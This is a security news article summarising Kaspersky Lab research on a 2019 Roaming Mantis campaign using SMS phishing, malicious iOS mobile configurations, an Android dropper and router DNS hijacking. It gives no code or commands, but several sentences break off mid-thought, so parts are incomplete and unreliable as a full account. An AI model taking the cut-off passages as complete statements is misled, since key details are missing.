Security experts at Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a new campaign associated with Roaming Mantis gang.
Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.
The latest wave of attacks aimed at spreading phishing links via SMS messages (SMiShing), most of the victims were users in Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran,
Researchers detected Roaming Mantis-related malware over 6,800 times for more than 950 unique users in the period between February 25 and March 20, 2019.
Attackers used a new method of phishing with malicious mobile configurations along with previously observed DNS manipulation technique.
Unlike previous attacks, this time Roaming Mantis attackers used a new landing page to target iOS devices in the attempt to trick victims into
The configuration allows the launch of the phishing site in a web browser and to gather information from the target’s device.
“Our key finding is that the actor continues to seek ways to compromise
“After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI
“On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.
In late February 2019, experts detected a URL query of a malicious DNS changer that attackers used to compromise router DNS settings. The attack works if the following conditions are met: no authentication for the router’s control panel from the
Experts at Kaspersky discovered that several hundred routers have been compromised in this way and that all pointed to the rogue DNS IPs.
“We have seen
Kaspersky concludes “We find the use of malicious mobile config especially alarming as this may cause serious problems for the users,”